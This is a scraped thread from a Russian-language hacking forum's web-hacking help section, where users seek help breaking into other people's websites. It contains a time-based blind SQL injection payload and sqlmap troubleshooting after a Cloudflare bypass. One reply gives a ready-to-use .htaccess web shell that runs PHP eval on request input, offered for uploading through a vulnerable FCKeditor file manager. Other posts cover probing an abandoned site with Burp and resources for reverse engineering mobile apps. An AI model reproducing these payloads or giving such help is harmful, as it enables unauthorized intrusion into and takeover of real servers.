• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Пожалуйста, обратите внимание, что пользователь заблокирован
Не могу сообразить, как пайлоад переделать под мап
Есть такой пайлоад на блинд инъекцию 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z , но мап его отказывается воспринимать
А в чем профит этого запроса?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Очень похож на запрос сканера. Только то что автор прислал не весь запрос. Вообщем, в sqlmap так можно писать запрос, только не факт что он его воспримет. Там что-то типа того sqlmap site.ru/id=1 union select null,null{table}. Дальше надо гугл спрашивать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Очень похож на запрос сканера. Только то что автор прислал не весь запрос. Вообщем, в sqlmap так можно писать запрос, только не факт что он его воспримет. Там что-то типа того sqlmap site.ru/id=1 union select null,null{table}. Дальше надо гугл спрашивать
Все разобрался, это ко всему прочему оказалась фп, реакции на таймс нет
Да, это запрос сканера
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Все разобрался, это ко всему прочему оказалась фп, реакции на таймс нет
Да, это запрос сканера
Если что образайся, и лучше выкладывай полные запросы, что делал, что получал, линк и уязвимый параметр
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Доброго времени суток, хотел поинтересоваться у знающих людей. Где можно почитать про реверс инжиниринг мобильных приложений? Если есть годные ссылки, статьи, туториалы, в том числе видео обучения буду очень рад!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Доброго времени суток, хотел поинтересоваться у знающих людей. Где можно почитать про реверс инжиниринг мобильных приложений? Если есть годные ссылки, статьи, туториалы, в том числе видео обучения буду очень рад!
В случае с ios (как и с android) вас интересует исследование бинарных приложений, работающих на ARM архитектуре процессоров, попытайтесь ознакомиться с материалами в этом направлении и с устройством таких процессоров.
Несколько полезных ссылок (направленных на RE ios приложений):
+ сам канал https://www.youtube.com/channel/UCk2sx_3FUkKvDGlIhdUQa8A
На первое время этого будет достаточно.
Вероятнее всего всего вам помогут такие отладчики, как: ida pro, hopper disassembler (mac), binary ninja, radare2 (кроссплатформенный)
 
Последнее редактирование:
Что значит эта ошибка?
Обычный баг приводящий к раскрытию путей, не более.
Однако, где .phtml там и .shtml может затереться, поэтому не забывай про SSI ;) Если конечно, продолжишь ковырять.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
что является лучшей альтернативой с открытым исходным кодом сканеру уязвимостей acunetix?

(en) what is the best open source alternative of accunetix web scanner?
Самоптсный инструмент
 
Здравствуйте уважаемые юзеры, возник такой вопрос: есть заброшенный сайт, по всей видимости node.js+socket.io, dirbuster выдаёт 200 на любую ссылку, в силу своей неопытности не знаю за что взяться, пробовал играться burp'ом, получаю ответ в роде "ok",меняю "Traderequest" получаю code: 1 session unknown, так же получал {"found":false}, на сайте есть авторизация по steam api, return возвращает к главной странице авторизации не происходит. Была мысль сдекриптить socket session чтобы получить какие-то данные, но base64 помогать отказался, скорее всего посоленная сессия. Что можно сделать?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Столкнулся с проблемой.
Иммется ксореная таймс блинд скуля, все отлично, все раскручивается.
ssl подключен, вот при попытке получить имя бд происходит следующая ошибка
Код:
[08:29:40] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_1' ('SSL EOF Error: EOF occurred in violation of protocol (_ssl.c:719)')
[08:30:10] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_2' ('SSL EOF Error: EOF occurred in violation of protocol (_ssl.c:719)')

Сайт накрыт клаудом, при помощи тепера удалось обойти, но вот имена бд и кол-во не выдает.
При попытке получить имена бд используя http://... уже выдает кол-во бд и очень исковеркано information_schema, но дальше продвинуться не вышло
back-end DBMS: MySQL >= 5.0.12


Вопрос в том, как обойти ошибку ссл соединения?
 
Последнее редактирование:
Вот первый вопрос к тебе) http://site.com/FCKeditor/editor/filemanager/upload/test.html есть такой эдитор, тут можно залить шелл, но файлы php он принимать отказывается. А другие файлы сохраняет в папку http://site.com/UserFiles/yad_num.txt , но открывать не хочет, думаю что прав нет. Что бы разрешить чтение для всех пользователей, нужно залить файл .htaccess с каким то содержимым.

подскажите что это за содержимое такое? allow from all пробовал.
 
Вот первый вопрос к тебе) http://site.com/FCKeditor/editor/filemanager/upload/test.html есть такой эдитор, тут можно залить шелл, но файлы php он принимать отказывается. А другие файлы сохраняет в папку http://site.com/UserFiles/yad_num.txt , но открывать не хочет, думаю что прав нет. Что бы разрешить чтение для всех пользователей, нужно залить файл .htaccess с каким то содержимым.

подскажите что это за содержимое такое? allow from all пробовал.
Если прям .htaccess дает залить в текущую директорию (в чем я крайне сомневаюсь), так заливай сразу мини шелл:
Код:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php eval($_REQUEST['code']); ?>
domain.com/.htaccess?code=phpinfo();

А вообще, смотри в сторону не что фильтруется, а что не фильтруется. Так быстрее поймешь стоит ли с ним возиться.
 
Если прям .htaccess дает залить в текущую директорию (в чем я крайне сомневаюсь), так заливай сразу мини шелл:
Код:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php eval($_REQUEST['code']); ?>
domain.com/.htaccess?code=phpinfo();

А вообще, смотри в сторону не что фильтруется, а что не фильтруется. Так быстрее поймешь стоит ли с ним возиться.
Спасибо за ответ) не получилось правда(
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх